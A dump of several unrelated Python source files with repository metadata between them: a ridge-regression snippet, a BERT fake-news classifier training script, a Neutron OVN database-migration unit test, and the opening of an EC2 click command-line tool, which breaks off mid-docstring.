from time import time  # the script below calls time() directly
if __name__ == '__main__':
TEST_SIZE = 0.2
LAMBDA = 1
y = np.load('datasets/y.npy')
csr = sparse.load_npz('datasets/x_csr.npz')
X = csr.toarray()
# X[:,0] = (X[:,0] - X[:,0].mean()) / X[:,0].std()
X[:,0] = (X[:,0] - X[:,0].min()) / (X[:,0].max() - X[:,0].min())
# X = X[:,:100]
train_sample = np.random.choice(
[0,1],
replace=True,
size=X.shape[0],
p=[TEST_SIZE, 1-TEST_SIZE],
).astype(bool)
X_train = X[train_sample]
y_train = y[train_sample]
X_test = X[~train_sample]
y_test = y[~train_sample]
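  # Closed-form ridge regression (explanatory note): theta = (X^T X + lambda * I)^(-1) X^T y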
start = time()
theta = np.linalg.inv(X_train.T.dot(X_train) + LAMBDA * np.eye(X_train.shape[1])).dot(X_train.T).dot(y_train)
stop = time()
print('Results for X shape: {}'.format(X.shape))
print(' Total time: {}'.format(stop - start))
y_pred = X_test.dot(theta).round(0)
MAE = np.abs(y_pred - y_test).mean()
print(' MAE: {}'.format(MAE))
df_res = pd.DataFrame({'pred':y_pred, 'gold':y_test})
print(df_res.head(10))
| 27.469697 | 111 | 0.663541 |
48a02234f2254a037dbe99896483efb4166ba6a4 | 26,425 | py | Python | src/train.py | prathameshmahankal/Fake-News-Detection-Using-BERT | 7723843520b95d898890b70a909ac19ecb0eeffa | [
"MIT"
] | 3 | 2021-05-28T22:42:40.000Z | 2022-03-18T01:03:14.000Z | src/train.py | VeraSAMAooo/Fake-News-Detection-Using-BERT | 7723843520b95d898890b70a909ac19ecb0eeffa | [
"MIT"
] | null | null | null | src/train.py | VeraSAMAooo/Fake-News-Detection-Using-BERT | 7723843520b95d898890b70a909ac19ecb0eeffa | [
"MIT"
] | 2 | 2021-12-01T19:03:53.000Z | 2022-02-20T02:45:04.000Z | import numpy as np
import argparse
import os
import pandas as pd
import torch
import time
import joblib
import torch.nn as nn
from sklearn.model_selection import train_test_split
from sklearn.metrics import (classification_report, f1_score, recall_score, precision_score,
precision_recall_curve, confusion_matrix, matthews_corrcoef)
import transformers
from transformers import AutoModel, BertTokenizerFast
from transformers import AdamW
from sklearn.utils.class_weight import compute_class_weight
from azureml.core import Workspace, Run, Dataset
import matplotlib.pyplot as plt
# parameters
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_path',
type=str,
help='Path to the training data'
)
parser.add_argument(
'--learning_rate',
type=float,
default=3e-5,
help='Learning rate for SGD'
)
parser.add_argument(
'--batch_size',
type=int,
dest='batch_size',
default=8
)
parser.add_argument(
'--adam_epsilon',
type=float,
dest='adam_epsilon',
default=1e-8
)
parser.add_argument(
'--num_epochs',
type=int,
dest='num_epochs',
default=3)
args = parser.parse_args()
batch_size = args.batch_size
learning_rate = args.learning_rate
adam_epsilon = args.adam_epsilon
num_epochs = args.num_epochs
print("Arguments: ", (batch_size, learning_rate, adam_epsilon, num_epochs))
# run = Run.get_context()
print("===== DATA =====")
print("DATA PATH: " + args.data_path)
print("LIST FILES IN DATA PATH...")
print(os.listdir(args.data_path))
print("================")
# ws = run.experiment.workspace
# # get the input dataset by ID
# dataset = Dataset.get_by_id(ws, id=args.data_path)
# # load the TabularDataset to pandas DataFrame
# df = dataset.to_pandas_dataframe()
df = pd.read_csv(args.data_path+'/newdatasetwithcoviddata.csv')
df.dropna(inplace=True)
df = df.sample(50000)
train_text, temp_text, train_labels, temp_labels = train_test_split(df['text'], df['label'],
random_state=2018,
test_size=0.4,
stratify=df['label'])
# we will use temp_text and temp_labels to create validation and test set
val_text, test_text, val_labels, test_labels = train_test_split(temp_text, temp_labels,
random_state=2018,
test_size=0.5,
stratify=temp_labels)
# import BERT-base pretrained model
bert = AutoModel.from_pretrained('bert-base-uncased')
## Tokenization
max_seq_len = 25
# Load the BERT tokenizer
tokenizer = BertTokenizerFast.from_pretrained('bert-base-uncased')
# tokenize and encode sequences in the training set
tokens_train = tokenizer.batch_encode_plus(
train_text.tolist(),
max_length = max_seq_len,
pad_to_max_length=True,
truncation=True,
return_token_type_ids=False
)
# tokenize and encode sequences in the validation set
tokens_val = tokenizer.batch_encode_plus(
val_text.tolist(),
max_length = max_seq_len,
pad_to_max_length=True,
truncation=True,
return_token_type_ids=False
)
# tokenize and encode sequences in the test set
tokens_test = tokenizer.batch_encode_plus(
test_text.tolist(),
max_length = max_seq_len,
pad_to_max_length=True,
truncation=True,
return_token_type_ids=False
)
## Convert Integer Sequences to Tensors
# for train set
train_seq = torch.tensor(tokens_train['input_ids'])
train_mask = torch.tensor(tokens_train['attention_mask'])
train_y = torch.tensor(train_labels.tolist())
# for validation set
val_seq = torch.tensor(tokens_val['input_ids'])
val_mask = torch.tensor(tokens_val['attention_mask'])
val_y = torch.tensor(val_labels.tolist())
# for test set
test_seq = torch.tensor(tokens_test['input_ids'])
test_mask = torch.tensor(tokens_test['attention_mask'])
test_y = torch.tensor(test_labels.tolist())
## Create DataLoaders
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
# #define a batch size
# batch_size = 32
# wrap tensors
train_data = TensorDataset(train_seq, train_mask, train_y)
# sampler for sampling the data during training
train_sampler = RandomSampler(train_data)
# dataLoader for train set
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=batch_size)
# wrap tensors
val_data = TensorDataset(val_seq, val_mask, val_y)
# sampler for sampling the data during training
val_sampler = SequentialSampler(val_data)
# dataLoader for validation set
val_dataloader = DataLoader(val_data, sampler = val_sampler, batch_size=batch_size)
## Freeze BERT Parameters
# freeze all the parameters
for param in bert.parameters():
param.requires_grad = False
## Define Model Architecture
class BERT_Arch(nn.Module):
def __init__(self, bert):
super(BERT_Arch, self).__init__()
self.bert = bert
# dropout layer
self.dropout = nn.Dropout(0.1)
# relu activation function
self.relu = nn.ReLU()
# dense layer 1
self.fc1 = nn.Linear(768,512)
# dense layer 2 (Output layer)
self.fc2 = nn.Linear(512,2)
#softmax activation function
self.softmax = nn.LogSoftmax(dim=1)
#define the forward pass
def forward(self, sent_id, mask):
#pass the inputs to the model
_, cls_hs = self.bert(sent_id, attention_mask=mask, return_dict=False)
x = self.fc1(cls_hs)
x = self.relu(x)
x = self.dropout(x)
# output layer
x = self.fc2(x)
# apply softmax activation
x = self.softmax(x)
return x
# pass the pre-trained BERT to our define architecture
model = BERT_Arch(bert)
# push the model to GPU
model = model.to(device)
# optimizer from hugging face transformers
# define the optimizer
optimizer = AdamW(model.parameters(), lr = learning_rate)
# adam_epsilon, num_epochs
## Find Class Weights
#compute the class weights
class_wts = compute_class_weight('balanced', np.unique(train_labels), train_labels)
# convert class weights to tensor
weights= torch.tensor(class_wts,dtype=torch.float)
weights = weights.to(device)
# loss function
cross_entropy = nn.NLLLoss(weight=weights)
## Fine Tune BERT
# function to train the model
def train():
model.train()
total_loss, total_accuracy = 0, 0
# empty list to save model predictions
total_preds=[]
# iterate over batches
for step,batch in enumerate(train_dataloader):
# progress update after every 50 batches.
if step % 50 == 0 and not step == 0:
print(' Batch {:>5,} of {:>5,}.'.format(step, len(train_dataloader)))
# push the batch to gpu
batch = [r.to(device) for r in batch]
sent_id, mask, labels = batch
# clear previously calculated gradients
model.zero_grad()
# get model predictions for the current batch
preds = model(sent_id, mask)
# compute the loss between actual and predicted values
loss = cross_entropy(preds, labels)
# add on to the total loss
total_loss = total_loss + loss.item()
# backward pass to calculate the gradients
loss.backward()
# clip the the gradients to 1.0. It helps in preventing the exploding gradient problem
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
# update parameters
optimizer.step()
# model predictions are stored on GPU. So, push it to CPU
preds=preds.detach().cpu().numpy()
# append the model predictions
total_preds.append(preds)
# compute the training loss of the epoch
avg_loss = total_loss / len(train_dataloader)
# predictions are in the form of (no. of batches, size of batch, no. of classes).
# reshape the predictions in form of (number of samples, no. of classes)
total_preds = np.concatenate(total_preds, axis=0)
#returns the loss and predictions
return avg_loss, total_preds
# function for evaluating the model
def evaluate():
print("\nEvaluating...")
# deactivate dropout layers
model.eval()
total_loss, total_accuracy = 0, 0
# empty list to save the model predictions
total_preds = []
# iterate over batches
for step,batch in enumerate(val_dataloader):
# Progress update every 50 batches.
if step % 50 == 0 and not step == 0:
# Calculate elapsed time in minutes.
# elapsed = format_time(time.time() - t0)
# Report progress.
print(' Batch {:>5,} of {:>5,}.'.format(step, len(val_dataloader)))
# push the batch to gpu
batch = [t.to(device) for t in batch]
sent_id, mask, labels = batch
# deactivate autograd
with torch.no_grad():
# model predictions
preds = model(sent_id, mask)
# compute the validation loss between actual and predicted values
loss = cross_entropy(preds,labels)
total_loss = total_loss + loss.item()
preds = preds.detach().cpu().numpy()
total_preds.append(preds)
# compute the validation loss of the epoch
avg_loss = total_loss / len(val_dataloader)
# reshape the predictions in form of (number of samples, no. of classes)
total_preds = np.concatenate(total_preds, axis=0)
return avg_loss, total_preds
# set initial loss to infinite
best_valid_loss = float('inf')
# empty lists to store training and validation loss of each epoch
train_losses=[]
valid_losses=[]
out_dir = './outputs'
#for each epoch
for epoch in range(num_epochs):
print('\n Epoch {:} / {:}'.format(epoch + 1, num_epochs))
#train model
train_loss, _ = train()
#evaluate model
valid_loss, _ = evaluate()
#save the best model
if valid_loss < best_valid_loss:
best_valid_loss = valid_loss
torch.save(model.state_dict(), out_dir+'/saved_weights.pt')
# append training and validation loss
train_losses.append(train_loss)
valid_losses.append(valid_loss)
print(f'\nTraining Loss: {train_loss:.3f}')
print(f'Validation Loss: {valid_loss:.3f}')
## Save losses
with open(out_dir + '/train_losses.pkl', 'wb') as f:
joblib.dump(train_losses, f)
with open(out_dir + '/val_losses.pkl', 'wb') as f:
joblib.dump(valid_losses, f)
plt.plot(range(len(train_losses)), train_losses, label='training loss')
plt.plot(range(len(valid_losses)), valid_losses, label='validation loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()
plt.savefig(out_dir + '/losses.png')
## Load Saved Model
#load weights of best model
model.load_state_dict(torch.load(out_dir+'/saved_weights.pt'))
## Get Predictions for Test Data
# get predictions for test data
with torch.no_grad():
preds = model(test_seq.to(device), test_mask.to(device))
preds = preds.detach().cpu().numpy()
# model's performance
precision_, recall_, proba = precision_recall_curve(test_y, preds[:, -1])
preds = np.argmax(preds, axis = 1)
#plot precision-recall curve
plt.plot(recall_, precision_, marker='.', label='BERT-model')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.legend()
plt.savefig(out_dir + '/precision-reall-curve.png')
# optimal_proba_cutoff = sorted(list(zip(np.abs(precision_ - recall_), proba)), key=lambda i: i[0], reverse=False)[0][1]
# preds = [1 if i >= optimal_proba_cutoff else 0 for i in preds[:, -1]]
mcc = matthews_corrcoef(test_y, preds)
tn, fp, fn, tp = confusion_matrix(test_y, preds).ravel()
precision = precision_score(test_y, preds)
recall = recall_score(test_y, preds)
f1 = f1_score(test_y, preds, average='weighted')
cm = confusion_matrix(test_y, preds)
print("")
print("Matthews Corr Coef:", mcc)
print("Precision:", precision)
print("Recall:", recall)
print("f-1 score:", f1)
print("confusion Matrix:", cm)
print("")
print(classification_report(test_y, preds))
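# Illustrative inference sketch (not part of the original script): with the fine-tuned
# weights loaded above, a new article could be scored roughly as follows; `new_text`
# is a hypothetical string variable.
#
#     tokens = tokenizer.batch_encode_plus([new_text], max_length=max_seq_len,
#                                          pad_to_max_length=True, truncation=True,
#                                          return_token_type_ids=False)
#     seq = torch.tensor(tokens['input_ids']).to(device)
#     mask = torch.tensor(tokens['attention_mask']).to(device)
#     with torch.no_grad():
#         label = np.argmax(model(seq, mask).detach().cpu().numpy(), axis=1)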
# from __future__ import absolute_import, division, print_function
# import glob
# import logging
# import os
# import random
# import json
# import numpy as np
# import torch
# from torch.utils.data import (DataLoader, RandomSampler, SequentialSampler, TensorDataset)
# import random
# from torch.utils.data.distributed import DistributedSampler
# from tqdm import tqdm_notebook, trange
# from pytorch_transformers import (WEIGHTS_NAME, BertConfig, BertForSequenceClassification, BertTokenizer,
# XLMConfig, XLMForSequenceClassification, XLMTokenizer,
# XLNetConfig, XLNetForSequenceClassification, XLNetTokenizer,
# RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer)
# from pytorch_transformers import AdamW, WarmupLinearSchedule
# from sklearn.metrics import (mean_squared_error, matthews_corrcoef, confusion_matrix, f1_score,
# precision_score, recall_score, precision_recall_curve, plot_precision_recall_curve)
# from scipy.stats import pearsonr
# from utils import (convert_examples_to_features, output_modes, processors)
# logging.basicConfig(level=logging.INFO)
# logger = logging.getLogger(__name__)
# def load_and_cache_examples(task, tokenizer, evaluate=False, undersample_scale_factor=0.01):
# processor = processors[task]()
# output_mode = args['output_mode']
# mode = 'dev' if evaluate else 'train'
# cached_features_file = os.path.join(args['data_dir'], f"cached_{mode}_{args['model_name']}_{args['max_seq_length']}_{task}")
# if os.path.exists(cached_features_file) and not args['reprocess_input_data']:
# logger.info("Loading features from cached file %s", cached_features_file)
# features = torch.load(cached_features_file)
# else:
# logger.info("Creating features from dataset file at %s", args['data_dir'])
# label_list = processor.get_labels()
# examples = processor.get_dev_examples(args['data_dir']) if evaluate else processor.get_train_examples(args['data_dir'])
# print(len(examples))
# examples = [example for example in examples if np.random.rand() < undersample_scale_factor]
# print(len(examples))
# features = convert_examples_to_features(examples, label_list, args['max_seq_length'], tokenizer, output_mode,
# cls_token_at_end=bool(args['model_type'] in ['xlnet']), # xlnet has a cls token at the end
# cls_token=tokenizer.cls_token,
# sep_token=tokenizer.sep_token,
# cls_token_segment_id=2 if args['model_type'] in ['xlnet'] else 0,
# pad_on_left=bool(args['model_type'] in ['xlnet']), # pad on the left for xlnet
# pad_token_segment_id=4 if args['model_type'] in ['xlnet'] else 0,
# process_count=2)
# logger.info("Saving features into cached file %s", cached_features_file)
# torch.save(features, cached_features_file)
# all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
# all_input_mask = torch.tensor([f.input_mask for f in features], dtype=torch.long)
# all_segment_ids = torch.tensor([f.segment_ids for f in features], dtype=torch.long)
# if output_mode == "classification":
# all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
# elif output_mode == "regression":
# all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.float)
# dataset = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)
# return dataset
# def train(train_dataset, model, tokenizer):
# train_sampler = RandomSampler(train_dataset)
# train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args['train_batch_size'])
# t_total = len(train_dataloader) // args['gradient_accumulation_steps'] * args['num_train_epochs']
# no_decay = ['bias', 'LayerNorm.weight']
# optimizer_grouped_parameters = [
# {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': args['weight_decay']},
# {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
# ]
# optimizer = AdamW(optimizer_grouped_parameters, lr=args['learning_rate'], eps=args['adam_epsilon'])
# scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args['warmup_steps'], t_total=t_total)
# if args['fp16']:
# try:
# from apex import amp
# except ImportError:
# raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
# model, optimizer = amp.initialize(model, optimizer, opt_level=args['fp16_opt_level'])
# logger.info("***** Running training *****")
# logger.info(" Num examples = %d", len(train_dataset))
# logger.info(" Num Epochs = %d", args['num_train_epochs'])
# logger.info(" Total train batch size = %d", args['train_batch_size'])
# logger.info(" Gradient Accumulation steps = %d", args['gradient_accumulation_steps'])
# logger.info(" Total optimization steps = %d", t_total)
# global_step = 0
# tr_loss, logging_loss = 0.0, 0.0
# model.zero_grad()
# train_iterator = trange(int(args['num_train_epochs']), desc="Epoch")
# for _ in train_iterator:
# epoch_iterator = tqdm_notebook(train_dataloader, desc="Iteration")
# for step, batch in enumerate(epoch_iterator):
# model.train()
# batch = tuple(t.to(device) for t in batch)
# inputs = {'input_ids': batch[0],
# 'attention_mask': batch[1],
# 'token_type_ids': batch[2] if args['model_type'] in ['bert', 'xlnet'] else None, # XLM don't use segment_ids
# 'labels': batch[3]}
# outputs = model(**inputs)
# loss = outputs[0] # model outputs are always tuple in pytorch-transformers (see doc)
# print("\r%f" % loss, end='')
# if args['gradient_accumulation_steps'] > 1:
# loss = loss / args['gradient_accumulation_steps']
# if args['fp16']:
# with amp.scale_loss(loss, optimizer) as scaled_loss:
# scaled_loss.backward()
# torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args['max_grad_norm'])
# else:
# loss.backward()
# torch.nn.utils.clip_grad_norm_(model.parameters(), args['max_grad_norm'])
# tr_loss += loss.item()
# if (step + 1) % args['gradient_accumulation_steps'] == 0:
# scheduler.step() # Update learning rate schedule
# optimizer.step()
# model.zero_grad()
# global_step += 1
# if args['logging_steps'] > 0 and global_step % args['logging_steps'] == 0:
# # Log metrics
# if args['evaluate_during_training']: # Only evaluate when single GPU otherwise metrics may not average well
# results = evaluate(model, tokenizer)
# logging_loss = tr_loss
# if args['save_steps'] > 0 and global_step % args['save_steps'] == 0:
# # Save model checkpoint
# output_dir = os.path.join(args['output_dir'], 'checkpoint-{}'.format(global_step))
# if not os.path.exists(output_dir):
# os.makedirs(output_dir)
# model_to_save = model.module if hasattr(model, 'module') else model # Take care of distributed/parallel training
# model_to_save.save_pretrained(output_dir)
# logger.info("Saving model checkpoint to %s", output_dir)
# return global_step, tr_loss / global_step
# def get_mismatched(labels, preds):
# mismatched = labels != preds
# examples = processor.get_dev_examples(args['data_dir'])
# wrong = [i for (i, v) in zip(examples, mismatched) if v]
# return wrong
# def get_eval_report(labels, preds):
# mcc = matthews_corrcoef(labels, preds)
# tn, fp, fn, tp = confusion_matrix(labels, preds).ravel()
# precision = precision_score(labels, preds)
# recall = recall_score(labels, preds)
# f1 = f1_score(labels, preds, average='weighted')
# return {
# "mcc": mcc,
# "f1":f1,
# "precision":precision,
# "recall":recall,
# "tp": tp,
# "tn": tn,
# "fp": fp,
# "fn": fn
# }, get_mismatched(labels, preds)
# def compute_metrics(task_name, preds, labels):
# assert len(preds) == len(labels)
# return get_eval_report(labels, preds)
# def evaluate(model, tokenizer, prefix=""):
# # Loop to handle MNLI double evaluation (matched, mis-matched)
# eval_output_dir = args['output_dir']
# results = {}
# EVAL_TASK = args['task_name']
# eval_dataset = load_and_cache_examples(EVAL_TASK, tokenizer, evaluate=True)
# if not os.path.exists(eval_output_dir):
# os.makedirs(eval_output_dir)
# eval_sampler = SequentialSampler(eval_dataset)
# eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args['eval_batch_size'])
# # Eval!
# logger.info("***** Running evaluation {} *****".format(prefix))
# logger.info(" Num examples = %d", len(eval_dataset))
# logger.info(" Batch size = %d", args['eval_batch_size'])
# eval_loss = 0.0
# nb_eval_steps = 0
# preds = None
# out_label_ids = None
# for batch in tqdm_notebook(eval_dataloader, desc="Evaluating"):
# model.eval()
# batch = tuple(t.to(device) for t in batch)
# with torch.no_grad():
# inputs = {'input_ids': batch[0],
# 'attention_mask': batch[1],
# 'token_type_ids': batch[2] if args['model_type'] in ['bert', 'xlnet'] else None, # XLM don't use segment_ids
# 'labels': batch[3]}
# outputs = model(**inputs)
# tmp_eval_loss, logits = outputs[:2]
# eval_loss += tmp_eval_loss.mean().item()
# nb_eval_steps += 1
# if preds is None:
# preds = logits.detach().cpu().numpy()
# out_label_ids = inputs['labels'].detach().cpu().numpy()
# else:
# preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
# out_label_ids = np.append(out_label_ids, inputs['labels'].detach().cpu().numpy(), axis=0)
# eval_loss = eval_loss / nb_eval_steps
# if args['output_mode'] == "classification":
# # preds = np.argmax(preds, axis=1)
# precision_, recall_, proba = precision_recall_curve(out_label_ids, preds[:, -1])
# optimal_proba_cutoff = sorted(list(zip(np.abs(precision_ - recall_), proba)), key=lambda i: i[0], reverse=False)[0][1]
# print("Optimum threshold is:", optimal_proba_cutoff)
# preds = [1 if i >= optimal_proba_cutoff else 0 for i in preds[:, -1]]
# elif args['output_mode'] == "regression":
# preds = np.squeeze(preds)
# result, wrong = compute_metrics(EVAL_TASK, preds, out_label_ids)
# results.update(result)
# output_eval_file = os.path.join(eval_output_dir, "eval_results.txt")
# with open(output_eval_file, "w") as writer:
# logger.info("***** Eval results {} *****".format(prefix))
# for key in sorted(result.keys()):
# logger.info(" %s = %s", key, str(result[key]))
# writer.write("%s = %s\n" % (key, str(result[key])))
# return results, wrong
# args = json.loads('args.json')
# MODEL_CLASSES = {
# 'bert': (BertConfig, BertForSequenceClassification, BertTokenizer),
# 'xlnet': (XLNetConfig, XLNetForSequenceClassification, XLNetTokenizer),
# 'xlm': (XLMConfig, XLMForSequenceClassification, XLMTokenizer),
# 'roberta': (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer)
# }
# config_class, model_class, tokenizer_class = MODEL_CLASSES[args['model_type']]
# config = config_class.from_pretrained(args['model_name'], num_labels=2, finetuning_task=args['task_name'])
# tokenizer = tokenizer_class.from_pretrained(args['model_name'])
# model = model_class.from_pretrained(args['model_name'])
# model.to(device);
# task = args['task_name']
# processor = processors[task]()
# label_list = processor.get_labels()
# num_labels = len(label_list)
# ### Optional ###
# if args['do_train']:
# train_dataset = load_and_cache_examples(task, tokenizer, undersample_scale_factor=0.1)
# global_step, tr_loss = train(train_dataset, model, tokenizer)
# logger.info(" global_step = %s, average loss = %s", global_step, tr_loss)
# ### Optional ###
# if args['do_train']:
# if not os.path.exists(args['output_dir']):
# os.makedirs(args['output_dir'])
# logger.info("Saving model checkpoint to %s", args['output_dir'])
# model_to_save = model.module if hasattr(model, 'module') else model # Take care of distributed/parallel training
# model_to_save.save_pretrained(args['output_dir'])
# tokenizer.save_pretrained(args['output_dir'])
# torch.save(args, os.path.join(args['output_dir'], 'training_args.bin'))
# results = {}
# if args['do_eval']:
# checkpoints = [args['output_dir']]
# if args['eval_all_checkpoints']:
# checkpoints = list(os.path.dirname(c) for c in sorted(glob.glob(args['output_dir'] + '/**/' + WEIGHTS_NAME, recursive=True)))
# logging.getLogger("pytorch_transformers.modeling_utils").setLevel(logging.WARN) # Reduce logging
# logger.info("Evaluate the following checkpoints: %s", checkpoints)
# for checkpoint in checkpoints:
# global_step = checkpoint.split('-')[-1] if len(checkpoints) > 1 else ""
# model = model_class.from_pretrained(checkpoint)
# model.to(device)
# result, wrong_preds = evaluate(model, tokenizer, prefix=global_step)
# result = dict((k + '_{}'.format(global_step), v) for k, v in result.items())
# results.update(result)
# print(results) | 35.139628 | 140 | 0.656575 |
0b9ad4b521df540970b8806ae195225ff8874e6c | 7,567 | py | Python | neutron/tests/unit/plugins/ml2/drivers/ovn/test_db_migration.py | Joffref/neutron | 09f72d2ac42ff92a4a3f96dd00800ba0cf367270 | [
"Apache-2.0"
] | 1,080 | 2015-01-04T08:35:00.000Z | 2022-03-27T09:15:52.000Z | neutron/tests/unit/plugins/ml2/drivers/ovn/test_db_migration.py | Joffref/neutron | 09f72d2ac42ff92a4a3f96dd00800ba0cf367270 | [
"Apache-2.0"
] | 24 | 2015-02-21T01:48:28.000Z | 2021-11-26T02:38:56.000Z | neutron/tests/unit/plugins/ml2/drivers/ovn/test_db_migration.py | Joffref/neutron | 09f72d2ac42ff92a4a3f96dd00800ba0cf367270 | [
"Apache-2.0"
] | 1,241 | 2015-01-02T10:47:10.000Z | 2022-03-27T09:42:23.000Z | # Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from neutron_lib.api.definitions import portbindings as pb
from neutron_lib.api.definitions import provider_net as pnet
from neutron_lib import context as n_context
from neutron_lib.db import api as db_api
from neutron_lib import exceptions
from oslo_utils import uuidutils
from neutron.db.models.plugins.ml2 import geneveallocation
from neutron.db.models.plugins.ml2 import vxlanallocation
from neutron.objects import ports as port_obj
from neutron.objects import trunk as trunk_obj
from neutron.plugins.ml2.drivers.ovn import db_migration
from neutron.tests.unit.plugins.ml2.drivers.ovn.mech_driver import (
test_mech_driver)
class TestMigrateNeutronDatabaseToOvn(
test_mech_driver.TestOVNMechanismDriverBase):
def _create_ml2_ovs_test_resources(self, vif_details_list):
self.subport_profiles = {}
ctx = n_context.get_admin_context()
for sid in range(1, 6):
net_arg = {pnet.NETWORK_TYPE: 'vxlan',
pnet.SEGMENTATION_ID: sid}
network_id = self._make_network(self.fmt, 'net%d' % sid, True,
arg_list=(pnet.NETWORK_TYPE,
pnet.SEGMENTATION_ID,),
**net_arg)['network']['id']
for vif_details in vif_details_list:
port = self._make_port(self.fmt, network_id)['port']
port_o = port_obj.PortBinding.get_object(
ctx, port_id=port['id'], host='')
port_o.vif_type = 'ovs'
port_o.vif_details = vif_details
port_o.update()
for i in range(1, 4):
port = self._make_port(self.fmt, network_id)['port']
subport1 = self._make_port(self.fmt, network_id)['port']
subport2 = self._make_port(self.fmt, network_id)['port']
trunk_id = uuidutils.generate_uuid()
subports = [trunk_obj.SubPort(
ctx,
port_id=subport1['id'],
trunk_id=trunk_id,
segmentation_type="vlan",
segmentation_id=i * 10 + j) for j in range(2)]
trunk = trunk_obj.Trunk(
ctx,
id=trunk_id,
port_id=port['id'],
project_id='foo',
subports=subports)
trunk.create()
subport_pb = port_obj.PortBinding.get_object(
ctx, port_id=subport1['id'], host='')
self.assertFalse(subport_pb.profile)
self.subport_profiles[subport1['id']] = {"parent_name": port['id'],
"tag": i * 10}
self.subport_profiles[subport2['id']] = {"parent_name": port['id'],
"tag": i * 10 + 1}
# set something to the last subport port binding
subport_pb = port_obj.PortBinding.get_object(
ctx, port_id=subport2['id'], host='')
# need to generate new id
subport_pb.profile = subport_pb.profile.copy()
subport_pb.profile['foo'] = 'bar'
subport_pb.update()
self.subport_profiles[subport2['id']]["foo"] = "bar"
def _validate_resources_after_migration(self, expected_vif_details):
ctx = n_context.get_admin_context()
# Check network types
networks = self.plugin.get_networks(ctx)
for network in networks:
self.assertEqual("geneve", network["provider:network_type"])
with db_api.CONTEXT_READER.using(ctx) as session:
# Check there are no vxlan allocations
vxlan_allocations = session.query(
vxlanallocation.VxlanAllocation).filter(
vxlanallocation.VxlanAllocation.allocated == True # noqa
).all()
self.assertFalse(vxlan_allocations)
# Check all the networks have Geneve allocations
geneve_allocations = session.query(
geneveallocation.GeneveAllocation).filter(
geneveallocation.GeneveAllocation.allocated == True # noqa
).all()
self.assertEqual(len(networks), len(geneve_allocations))
# Check port bindings vif details are as expected
ports = self.plugin.get_ports(ctx)
for port in ports:
self.assertIn(port['binding:vif_details'], expected_vif_details)
# Check port profiles for subport ports
for trunk in trunk_obj.Trunk.get_objects(ctx):
for subport in trunk.sub_ports:
port = self.plugin.get_port(ctx, id=subport.port_id)
self.assertEqual(
self.subport_profiles[subport.port_id],
port["binding:profile"])
def test_db_migration(self):
"""Test the DB migration
It creates 5 vxlan networks, each should get a vxlan vni allocated.
Then it creates 3 ports with different vif details.
After the DB migration the vxlan networks should not be allocated but
be geneve type and have geneve allocations. Also the port binding vif
details should not contain hybrid plugging, bridge name for trunk and
l2 connectivity for OVS agent.
"""
vif_details_list = [
{pb.CAP_PORT_FILTER: "true",
pb.OVS_HYBRID_PLUG: "true",
pb.VIF_DETAILS_BRIDGE_NAME: "foo",
pb.VIF_DETAILS_CONNECTIVITY: pb.CONNECTIVITY_L2},
{pb.CAP_PORT_FILTER: "true",
pb.VIF_DETAILS_BRIDGE_NAME: "foo"},
{"foo": "bar"},
{},
]
expected_vif_details = [
{pb.CAP_PORT_FILTER: "true",
pb.VIF_DETAILS_CONNECTIVITY: pb.CONNECTIVITY_L2},
{pb.CAP_PORT_FILTER: "true"},
{"foo": "bar"},
{},
]
self._create_ml2_ovs_test_resources(vif_details_list)
db_migration.migrate_neutron_database_to_ovn(self.mech_driver._plugin)
self._validate_resources_after_migration(expected_vif_details)
def test_db_migration_with_pb_not_found(self):
vif_details_list = [
{pb.CAP_PORT_FILTER: "true",
pb.OVS_HYBRID_PLUG: "true",
pb.VIF_DETAILS_BRIDGE_NAME: "foo",
pb.VIF_DETAILS_CONNECTIVITY: "l2"},
{pb.CAP_PORT_FILTER: "true",
pb.VIF_DETAILS_BRIDGE_NAME: "foo"},
{"foo": "bar"},
{},
]
self._create_ml2_ovs_test_resources(vif_details_list)
with mock.patch.object(
port_obj.PortBinding, 'update',
side_effect=exceptions.ObjectNotFound(id='foo')):
with mock.patch.object(trunk_obj.Trunk, 'get_objects',
return_value=[]):
db_migration.migrate_neutron_database_to_ovn(
self.mech_driver._plugin)
self._validate_resources_after_migration(vif_details_list)
| 40.682796 | 79 | 0.612132 |
2bc6b1d2a56c9993b3d7f77a7c1219f8c16f4bb1 | 868 | py | Python | layersclick/ec2_instance.py | hdknr/py-layers | 884ffb2a681910cec7c8deb934c60a71dbd72b80 | [
"MIT"
] | null | null | null | layersclick/ec2_instance.py | hdknr/py-layers | 884ffb2a681910cec7c8deb934c60a71dbd72b80 | [
"MIT"
] | null | null | null | layersclick/ec2_instance.py | hdknr/py-layers | 884ffb2a681910cec7c8deb934c60a71dbd72b80 | [
"MIT"
] | null | null | null | import click
from layerslib.ec2 import instance
from .utils import J, setup
@click.group()
@click.option("--profile_name", "-p", default=None)
@click.pass_context
def ec2_instance(ctx, profile_name):
setup(ctx, profile_name)
@ec2_instance.command()
@click.pass_context
def instance_list(ctx):
"""ec2: get Instance
